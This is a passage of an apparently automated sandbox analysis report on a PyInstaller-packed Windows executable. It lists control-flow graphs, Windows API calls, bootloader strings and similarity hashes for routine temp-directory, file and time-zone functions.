7ff62c0f3e8f-7ff62c0f3e9c call 7ff62c0f6e00 290->293 294 7ff62c0f3ea7-7ff62c0f3eb1 call 7ff62c0f71b0 290->294 292->237 293->294 305 7ff62c0f3e9e-7ff62c0f3ea5 293->305 306 7ff62c0f3eb3-7ff62c0f3eba 294->306 307 7ff62c0f3ebc-7ff62c0f3eca call 7ff62c0f74f0 294->307 305->292 306->292 307->237 317 7ff62c0f3ecc 307->317 310->311 323 7ff62c0f3fb9-7ff62c0f3fce 310->323 320 7ff62c0f3ff9-7ff62c0f3ffb 311->320 317->292 320->222 324 7ff62c0f3fd0-7ff62c0f3fe3 call 7ff62c0f2710 call 7ff62c0f1900 323->324 325 7ff62c0f3fe8 call 7ff62c0f2a50 323->325 324->222 325->311
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                              • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                              • Opcode ID: b59ec9e18f1dd073e3b30b9e3dcae57b2124c2bfc9e785f26d811ecd91d23ade
                                                                                                                                                                                                                                              • Instruction ID: 07fd297666852b32e2404955a40a48b84be1a2526650888eaf70879d5613dbf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59ec9e18f1dd073e3b30b9e3dcae57b2124c2bfc9e785f26d811ecd91d23ade
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5329D21A0C68299FE15DB259C6A3F92391AF557B0F444032DE4DC32C6EF6EE598C30A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 479 7ff62c115c00-7ff62c115c3b call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 486 7ff62c115c41-7ff62c115c4c call 7ff62c115598 479->486 487 7ff62c115e65-7ff62c115eb1 call 7ff62c10a900 call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 479->487 486->487 492 7ff62c115c52-7ff62c115c5c 486->492 514 7ff62c115eb7-7ff62c115ec2 call 7ff62c115598 487->514 515 7ff62c115fef-7ff62c11605d call 7ff62c10a900 call 7ff62c111578 487->515 495 7ff62c115c7e-7ff62c115c82 492->495 496 7ff62c115c5e-7ff62c115c61 492->496 499 7ff62c115c85-7ff62c115c8d 495->499 498 7ff62c115c64-7ff62c115c6f 496->498 501 7ff62c115c7a-7ff62c115c7c 498->501 502 7ff62c115c71-7ff62c115c78 498->502 499->499 503 7ff62c115c8f-7ff62c115ca2 call 7ff62c10d5fc 499->503 501->495 505 7ff62c115cab-7ff62c115cb9 501->505 502->498 502->501 510 7ff62c115cba-7ff62c115cc6 call 7ff62c10a948 503->510 511 7ff62c115ca4-7ff62c115ca6 call 7ff62c10a948 503->511 519 7ff62c115ccd-7ff62c115cd5 510->519 511->505 514->515 523 7ff62c115ec8-7ff62c115ed3 call 7ff62c1155c8 514->523 531 7ff62c11606b-7ff62c11606e 515->531 532 7ff62c11605f-7ff62c116066 515->532 519->519 522 7ff62c115cd7-7ff62c115ce8 call 7ff62c110474 519->522 522->487 533 7ff62c115cee-7ff62c115d44 call 7ff62c11a4d0 * 4 call 7ff62c115b1c 522->533 523->515 534 7ff62c115ed9-7ff62c115efc call 7ff62c10a948 GetTimeZoneInformation 523->534 537 7ff62c116070 531->537 538 7ff62c1160a5-7ff62c1160b8 call 7ff62c10d5fc 531->538 536 7ff62c1160fb-7ff62c1160fe 532->536 591 7ff62c115d46-7ff62c115d4a 533->591 547 7ff62c115f02-7ff62c115f23 534->547 548 7ff62c115fc4-7ff62c115fee call 7ff62c115580 call 7ff62c115570 call 7ff62c115578 534->548 541 7ff62c116073 536->541 542 7ff62c116104-7ff62c11610c call 7ff62c115c00 536->542 537->541 552 7ff62c1160ba 538->552 553 7ff62c1160c3-7ff62c1160de call 7ff62c111578 538->553 549 7ff62c116078-7ff62c1160a4 call 7ff62c10a948 call 7ff62c0fc550 541->549 550 7ff62c116073 call 7ff62c115e7c 541->550 542->549 555 7ff62c115f2e-7ff62c115f35 547->555 556 7ff62c115f25-7ff62c115f2b 547->556 550->549 560 7ff62c1160bc-7ff62c1160c1 call 7ff62c10a948 552->560 578 7ff62c1160e0-7ff62c1160e3 553->578 579 7ff62c1160e5-7ff62c1160f7 call 7ff62c10a948 553->579 562 7ff62c115f37-7ff62c115f3f 555->562 563 7ff62c115f49 555->563 556->555 560->537 562->563 570 7ff62c115f41-7ff62c115f47 562->570 569 7ff62c115f4b-7ff62c115fbf call 7ff62c11a4d0 * 4 call 7ff62c112b5c call 7ff62c116114 * 2 563->569 569->548 570->569 578->560 579->536 593 7ff62c115d4c 591->593 594 7ff62c115d50-7ff62c115d54 591->594 593->594 594->591 596 7ff62c115d56-7ff62c115d7b call 7ff62c106b58 594->596 603 7ff62c115d7e-7ff62c115d82 596->603 605 7ff62c115d91-7ff62c115d95 603->605 606 7ff62c115d84-7ff62c115d8f 603->606 605->603 606->605 607 7ff62c115d97-7ff62c115d9b 606->607 609 7ff62c115e1c-7ff62c115e20 607->609 610 7ff62c115d9d-7ff62c115dc5 call 7ff62c106b58 607->610 612 7ff62c115e27-7ff62c115e34 609->612 613 7ff62c115e22-7ff62c115e24 609->613 619 7ff62c115dc7 610->619 620 7ff62c115de3-7ff62c115de7 610->620 615 7ff62c115e36-7ff62c115e4c call 7ff62c115b1c 612->615 616 7ff62c115e4f-7ff62c115e5e call 7ff62c115580 call 7ff62c115570 612->616 613->612 615->616 616->487 623 7ff62c115dca-7ff62c115dd1 619->623 620->609 625 7ff62c115de9-7ff62c115e07 call 7ff62c106b58 620->625 623->620 626 7ff62c115dd3-7ff62c115de1 623->626 631 7ff62c115e13-7ff62c115e1a 625->631 626->620 626->623 631->609 632 7ff62c115e09-7ff62c115e0d 631->632 632->609 633 7ff62c115e0f 632->633 633->631
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction ID: d061b790e320011e79604dc9619bf2e00105fd14082ef2a8b2f39ae4daa24266
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1D526F0865286EF20DF2ADC4A1B96761EFA47B4F848036DE0DC7A95DF7CE4418742

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 693 7ff62c116964-7ff62c1169d7 call 7ff62c116698 696 7ff62c1169d9-7ff62c1169e2 call 7ff62c104ee8 693->696 697 7ff62c1169f1-7ff62c1169fb call 7ff62c108520 693->697 702 7ff62c1169e5-7ff62c1169ec call 7ff62c104f08 696->702 703 7ff62c116a16-7ff62c116a7f CreateFileW 697->703 704 7ff62c1169fd-7ff62c116a14 call 7ff62c104ee8 call 7ff62c104f08 697->704 720 7ff62c116d32-7ff62c116d52 702->720 705 7ff62c116afc-7ff62c116b07 GetFileType 703->705 706 7ff62c116a81-7ff62c116a87 703->706 704->702 713 7ff62c116b09-7ff62c116b44 GetLastError call 7ff62c104e7c CloseHandle 705->713 714 7ff62c116b5a-7ff62c116b61 705->714 710 7ff62c116ac9-7ff62c116af7 GetLastError call 7ff62c104e7c 706->710 711 7ff62c116a89-7ff62c116a8d 706->711 710->702 711->710 718 7ff62c116a8f-7ff62c116ac7 CreateFileW 711->718 713->702 728 7ff62c116b4a-7ff62c116b55 call 7ff62c104f08 713->728 716 7ff62c116b69-7ff62c116b6c 714->716 717 7ff62c116b63-7ff62c116b67 714->717 723 7ff62c116b72-7ff62c116bc7 call 7ff62c108438 716->723 724 7ff62c116b6e 716->724 717->723 718->705 718->710 732 7ff62c116be6-7ff62c116c17 call 7ff62c116418 723->732 733 7ff62c116bc9-7ff62c116bd5 call 7ff62c1168a0 723->733 724->723 728->702 738 7ff62c116c19-7ff62c116c1b 732->738 739 7ff62c116c1d-7ff62c116c5f 732->739 733->732 740 7ff62c116bd7 733->740 741 7ff62c116bd9-7ff62c116be1 call 7ff62c10aac0 738->741 742 7ff62c116c81-7ff62c116c8c 739->742 743 7ff62c116c61-7ff62c116c65 739->743 740->741 741->720 745 7ff62c116d30 742->745 746 7ff62c116c92-7ff62c116c96 742->746 743->742 744 7ff62c116c67-7ff62c116c7c 743->744 744->742 745->720 746->745 748 7ff62c116c9c-7ff62c116ce1 CloseHandle CreateFileW 746->748 750 7ff62c116d16-7ff62c116d2b 748->750 751 7ff62c116ce3-7ff62c116d11 GetLastError call 7ff62c104e7c call 7ff62c108660 748->751 750->745 751->750
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: f3ffae9780d734514fcb538aa07b0dcc20ba3d22e7a81d5df1322f1f37e7ba48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1DF32B28A4686EF10CFA9D8962AC3761FB59BA8B014235DE1E977D4DF7DD051C301

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 5a4c9c5329e50b266b8a1199ffe3e1a54a90469d85353712d09d069954f98b4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0416021A0C94289EE209B24EC591FA6360FF96774F500332ED9DC2694EF7DE585C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1014 7ff62c115e7c-7ff62c115eb1 call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 1021 7ff62c115eb7-7ff62c115ec2 call 7ff62c115598 1014->1021 1022 7ff62c115fef-7ff62c11605d call 7ff62c10a900 call 7ff62c111578 1014->1022 1021->1022 1027 7ff62c115ec8-7ff62c115ed3 call 7ff62c1155c8 1021->1027 1033 7ff62c11606b-7ff62c11606e 1022->1033 1034 7ff62c11605f-7ff62c116066 1022->1034 1027->1022 1035 7ff62c115ed9-7ff62c115efc call 7ff62c10a948 GetTimeZoneInformation 1027->1035 1038 7ff62c116070 1033->1038 1039 7ff62c1160a5-7ff62c1160b8 call 7ff62c10d5fc 1033->1039 1037 7ff62c1160fb-7ff62c1160fe 1034->1037 1045 7ff62c115f02-7ff62c115f23 1035->1045 1046 7ff62c115fc4-7ff62c115fee call 7ff62c115580 call 7ff62c115570 call 7ff62c115578 1035->1046 1041 7ff62c116073 1037->1041 1042 7ff62c116104-7ff62c11610c call 7ff62c115c00 1037->1042 1038->1041 1050 7ff62c1160ba 1039->1050 1051 7ff62c1160c3-7ff62c1160de call 7ff62c111578 1039->1051 1047 7ff62c116078-7ff62c1160a4 call 7ff62c10a948 call 7ff62c0fc550 1041->1047 1048 7ff62c116073 call 7ff62c115e7c 1041->1048 1042->1047 1052 7ff62c115f2e-7ff62c115f35 1045->1052 1053 7ff62c115f25-7ff62c115f2b 1045->1053 1048->1047 1057 7ff62c1160bc-7ff62c1160c1 call 7ff62c10a948 1050->1057 1072 7ff62c1160e0-7ff62c1160e3 1051->1072 1073 7ff62c1160e5-7ff62c1160f7 call 7ff62c10a948 1051->1073 1058 7ff62c115f37-7ff62c115f3f 1052->1058 1059 7ff62c115f49 1052->1059 1053->1052 1057->1038 1058->1059 1065 7ff62c115f41-7ff62c115f47 1058->1065 1064 7ff62c115f4b-7ff62c115fbf call 7ff62c11a4d0 * 4 call 7ff62c112b5c call 7ff62c116114 * 2 1059->1064 1064->1046 1065->1064 1072->1057 1073->1037
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155DC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction ID: 0e42b684767fa3ed664132e555174cfc10165d9da2b06abb7b9885b629ba32e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451C532A0864286EF10DF29DC8B5B96760FFA87A4F808135EA4DC7B95DF7CE4418746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: 5c466dba17c168f6fd9a0177b639aa02d90b1af07c7b936a826a034eeb355c6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F06862A1874186FBB09B64B8997667350EB85778F040335DE6D42AD4DF7CD089CA05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                                              • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                              • Instruction ID: 16f16bad3f3088495e80f7b032d49450eb5dffb7d82bcd1b3f6ff16d461f0912
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45020121F1DA9741FE55AB19AC0F2B92680AF51BB0F458635ED5DE73D2DEBCE4008382

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
